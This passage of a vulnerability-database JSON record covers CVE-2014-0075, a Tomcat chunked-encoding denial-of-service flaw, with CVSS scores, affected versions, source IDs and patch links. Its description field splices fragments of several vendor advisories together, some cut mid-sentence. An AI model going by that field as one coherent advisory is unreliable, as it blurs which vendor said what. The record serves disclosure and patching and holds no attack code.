                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "131227"
      },
      {
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "db": "PACKETSTORM",
        "id": "127413"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2014-0075",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2014-0075",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-0075",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201405-585",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data. Description:\n\nRed Hat JBoss Data Virtualization is a lean data integration solution that\nprovides easy, real-time, and unified data access across disparate sources\nto multiple applications and users. JBoss Data Virtualization makes data\nspread across physically distinct systems-such as multiple databases, XML\nfiles, and even Hadoop systems-appear as a set of tables in a local\ndatabase. \n\nThis roll up patch serves as a cumulative upgrade for Red Hat JBoss Data\nVirtualization 6.0.0. It includes various bug fixes, which are listed in\nthe README file included with the patch files. \n\nThe following security issues are also fixed with this release,\ndescriptions of which can be found on the respective CVE pages linked in\nthe References section. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: tomcat security update\nAdvisory ID:       RHSA-2014:0827-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0827.html\nIssue date:        2014-07-02\nCVE Names:         CVE-2014-0075 CVE-2014-0096 CVE-2014-0099 \n=====================================================================\n\n1. Summary:\n\nUpdated tomcat packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 7. \n\nThe Red Hat Security Response Team has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch\nRed Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch\nRed Hat Enterprise Linux Workstation (v. 7) - noarch\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch\n\n3. Description:\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly. \n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity. \n\nAll Tomcat 7 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1072776 - CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter\n1088342 - CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs\n1102030 - CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\ntomcat-7.0.42-6.el7_0.src.rpm\n\nnoarch:\ntomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\ntomcat-7.0.42-6.el7_0.noarch.rpm\ntomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm\ntomcat-docs-webapp-7.0.42-6.el7_0.noarch.rpm\ntomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-javadoc-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsvc-7.0.42-6.el7_0.noarch.rpm\ntomcat-lib-7.0.42-6.el7_0.noarch.rpm\ntomcat-webapps-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\ntomcat-7.0.42-6.el7_0.src.rpm\n\nnoarch:\ntomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\ntomcat-7.0.42-6.el7_0.noarch.rpm\ntomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm\ntomcat-docs-webapp-7.0.42-6.el7_0.noarch.rpm\ntomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-javadoc-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsvc-7.0.42-6.el7_0.noarch.rpm\ntomcat-lib-7.0.42-6.el7_0.noarch.rpm\ntomcat-webapps-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\ntomcat-7.0.42-6.el7_0.src.rpm\n\nnoarch:\ntomcat-7.0.42-6.el7_0.noarch.rpm\ntomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm\ntomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-lib-7.0.42-6.el7_0.noarch.rpm\ntomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-webapps-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\ntomcat-7.0.42-6.el7_0.noarch.rpm\ntomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm\ntomcat-docs-webapp-7.0.42-6.el7_0.noarch.rpm\ntomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-javadoc-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsvc-7.0.42-6.el7_0.noarch.rpm\ntomcat-lib-7.0.42-6.el7_0.noarch.rpm\ntomcat-webapps-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\ntomcat-7.0.42-6.el7_0.src.rpm\n\nnoarch:\ntomcat-7.0.42-6.el7_0.noarch.rpm\ntomcat-admin-webapps-7.0.42-6.el7_0.noarch.rpm\ntomcat-el-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsp-2.2-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-lib-7.0.42-6.el7_0.noarch.rpm\ntomcat-servlet-3.0-api-7.0.42-6.el7_0.noarch.rpm\ntomcat-webapps-7.0.42-6.el7_0.noarch.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\ntomcat-docs-webapp-7.0.42-6.el7_0.noarch.rpm\ntomcat-javadoc-7.0.42-6.el7_0.noarch.rpm\ntomcat-jsvc-7.0.42-6.el7_0.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0075.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0096.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0099.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttp://tomcat.apache.org/security-7.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTs8+9XlSAg2UNWIIRAglqAJ4sw3DT+V4pFReZSRvkoW+f90gxdgCdFn5e\nbVOeybWcY1fm+xgpnE7T2ZM=\n=O2as\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2014-0096)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by JBoss Web to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same JBoss Web instance. On update,\nthe configuration files that have been locally modified will not be\nupdated. The updated version of such files will be stored as the rpmnew\nfiles. Make sure to locate any such files after the update and merge any\nchanges manually. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2015:052\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : tomcat\n Date    : March 3, 2015\n Affected: Business Server 1.0\n _______________________________________________________________________\n\n Problem Description:\n\n Updated tomcat packages fix security vulnerabilities:\n \n Apache Tomcat 7.x before 7.0.47, when an HTTP connector or AJP\n connector is used, does not properly handle certain inconsistent HTTP\n request headers, which allows remote attackers to trigger incorrect\n identification of a request\u0026#039;s length and conduct request-smuggling\n attacks via (1) multiple Content-Length headers or (2) a Content-Length\n header and a Transfer-Encoding: chunked header (CVE-2013-4286). \n \n java/org/apache/catalina/servlets/DefaultServlet.java in the default\n servlet in Apache Tomcat before 6.0.40 and 7.x before 7.0.53 does not\n properly restrict XSLT stylesheets, which allows remote attackers\n to bypass security-manager restrictions and read arbitrary files\n via a crafted web application that provides an XML external entity\n declaration in conjunction with an entity reference, related to an\n XML External Entity (XXE) issue (CVE-2014-0096).  The verification\n of md5 checksums and GPG signatures is performed automatically for you.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFU9XSSmqjQ0CJFipgRAorsAKDX0BTWLEiMn3+FR9/Xn58Pw7GIMwCfRAbS\nNzlDtJatpPDeZdZ4nlO1fgg=\n=NWBY\n-----END PGP SIGNATURE-----\n. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04483248\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04483248\nVersion: 1\n\nHPSBUX03150 SSRT101681 rev.1 - HP-UX Apache Server Suite running Apache\nTomcat or PHP, Remote Denial of Service (DoS) and Other Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-10-20\nLast Updated: 2014-10-20\n\nPotential Security Impact: Remote Denial of Service (DoS), man-in-the-middle\n(MitM) attack, HTTP request smuggling, modification of data; local\nmodification of data\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with the HP-UX Apache\nWeb Server Suite, Tomcat Servlet Engine, and PHP. These could be exploited\nremotely to create a Denial of Service (DoS) and other vulnerabilities. \n\nReferences:\n\nCVE-2013-4248 - PHP: man-in-the-middle (MitM) attack\n\nCVE-2013-4286 - Tomcat: remote HTTP request smuggling\n\nCVE-2013-6438 - Tomcat: remote Denial of Service (DoS)\n\nCVE-2014-0075 - Tomcat: remote Denial of Service (DoS)\n\nCVE-2014-0098 - Tomcat: remote Denial of Service (DoS)\n\nCVE-2014-0099 - Tomcat: remote HTTP request smuggling\n\nCVE-2014-3981 - PHP: local modification of data\n\nSSRT101681\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.23 running HP-UX Apache Web Server Suite v3.29 or earlier\n\nHP-UX B.11.23 running Tomcat v5.5.36.01 or earlier\n\nHP-UX B.11.23 running PHP v5.2.17.03 or earlier\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2013-4248    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3\nCVE-2013-4286    (AV:N/AC:M/Au:N/C:P/I:P/A:N)       5.8\nCVE-2013-6438    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-0075    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-0098    (AV:N/AC:L/Au:N/C:N/I:N/A:P)       5.0\nCVE-2014-0099    (AV:N/AC:M/Au:N/C:N/I:P/A:N)       4.3\nCVE-2014-3981    (AV:L/AC:M/Au:N/C:N/I:P/A:P)       3.3\n===========================================================\n             Information on CVSS is documented\n            in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following software updates to resolve the\nvulnerabilities. \n\nThe updates are available for download from http://software.hp.com\n\nNOTE: HP-UX Web Server Suite v3.30 HPUXWSATW330 contains Apache v2.2.15.21,\nTomcat Servlet Engine 5.5.36.02, and PHP 5.2.17.04\n\nHP-UX 11i Release\n Apache Depot name\n\nB.11.23 (11i v2 32-bit)\n HP_UX_11.23_HPUXWS22ATW-B330-11-23-32.depot\n\nB.11.23 (11i v2 64-bit)\n HP_UX_11.23_HPUXWS22ATW-B330-11-23-64.depot\n\nMANUAL ACTIONS: Yes - Update\nInstall HP-UX Web Server Suite v3.30 or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.23\n==================\nhpuxws22APCH32.APACHE\nhpuxws22APCH32.APACHE2\nhpuxws22APCH32.AUTH_LDAP\nhpuxws22APCH32.AUTH_LDAP2\nhpuxws22APCH32.MOD_JK\nhpuxws22APCH32.MOD_JK2\nhpuxws22APCH32.MOD_PERL\nhpuxws22APCH32.MOD_PERL2\nhpuxws22APCH32.PHP\nhpuxws22APCH32.PHP2\nhpuxws22APCH32.WEBPROXY\nhpuxws22APCH32.WEBPROXY2\nhpuxws22APACHE.APACHE\nhpuxws22APACHE.APACHE2\nhpuxws22APACHE.AUTH_LDAP\nhpuxws22APACHE.AUTH_LDAP2\nhpuxws22APACHE.MOD_JK\nhpuxws22APACHE.MOD_JK2\nhpuxws22APACHE.MOD_PERL\nhpuxws22APACHE.MOD_PERL2\nhpuxws22APACHE.PHP\nhpuxws22APACHE.PHP2\nhpuxws22APACHE.WEBPROXY\nhpuxws22APACHE.WEBPROXY2\nhpuxws22TOMCAT.TOMCAT\naction: install revision B.2.2.15.21 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 20 October 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code. \nThis update removes the redundant code. (BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "PACKETSTORM",
        "id": "131089"
      },
      {
        "db": "PACKETSTORM",
        "id": "131227"
      },
      {
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "127413"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-0075",
        "trust": 3.3
      },
      {
        "db": "SECUNIA",
        "id": "59678",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60793",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59616",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59835",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59849",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59121",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59732",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "59873",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "60729",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "67671",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "131089",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "131227",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127325",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127367",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130617",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127336",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127338",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128783",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127413",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002698"
      },
      {
        "db": "PACKETSTORM",
        "id": "131089"
      },
      {
        "db": "PACKETSTORM",
        "id": "131227"
      },
      {
        "db": "PACKETSTORM",
        "id": "127325"
      },
      {
        "db": "PACKETSTORM",
        "id": "127367"
      },
      {
        "db": "PACKETSTORM",
        "id": "130617"
      },
      {
        "db": "PACKETSTORM",
        "id": "127336"
      },
      {
        "db": "PACKETSTORM",
        "id": "127338"
      },
      {
        "db": "PACKETSTORM",
        "id": "128783"
      },
      {
        "db": "PACKETSTORM",
        "id": "127413"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0075"
      }
    ]
  },
  "id": "VAR-201405-0543",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.15072303
  },
  "last_update_date": "2024-07-23T20:25:58.247000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Apache Tomcat 6.x vulnerabilities",
        "trust": 0.8,
        "url": "http://tomcat.apache.org/security-6.html"
      },
      {
        "title": "Apache Tomcat 7.x vulnerabilities",
        "trust": 0.8,
        "url": "http://tomcat.apache.org/security-7.html"
      },
      {
        "title": "Apache Tomcat 8.x vulnerabilities",
        "trust": 0.8,
        "url": "http://tomcat.apache.org/security-8.html"
      },
      {
        "title": "Revision 1578341",
        "trust": 0.8,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578341"
      },
      {
        "title": "Revision 1578337",
        "trust": 0.8,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578337"
      },
      {
        "title": "Revision 1579262",
        "trust": 0.8,
        "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1579262"
      },
      {
        "title": "HS15-007",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs15-007/index.html"
      },
      {
        "title": "HPSBUX03150 SSRT101681",
        "trust": 0.8,
        "url": "http://h20565.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04483248\u0026lang=en\u0026cc=us"
      },
      {
        "title": "1680603",
        "trust": 0.8,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680603"
      },
      {
        "title": "1681528",
        "trust": 0.8,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681528"
      },
      {
        "title": "1678231",
        "trust": 0.8,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678231"
      },
      {
        "title": "7010166",
        "trust": 0.8,
        "url": "http://www.novell.com/support/kb/doc.php?id=7010166 "
      },
      {
        "title": "ELSA-2014-0865",
        "trust": 0.8,
        "url": "http://linux.oracle.com/errata/elsa-2014-0865.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2014 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014verbose-1972958.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2014",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - October 2014 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014verbose-1972962.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2014",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
      },
      {
        "title": "RHSA-2015:0765",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0765.html"
      },
      {
        "title": "RHSA-2015:0234",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0234.html"
      },
      {
        "title": "RHSA-2015:0235",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0235.html"
      },
      {
        "title": "RHSA-2015:0675",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0675.html"
      },
      {
        "title": "RHSA-2015:0720",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0720.html"
      },
      {
        "title": "October 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update"
      },
      {
        "title": "CVE-2014-0075 Numeric Errors vulnerability in Apache Tomcat ",
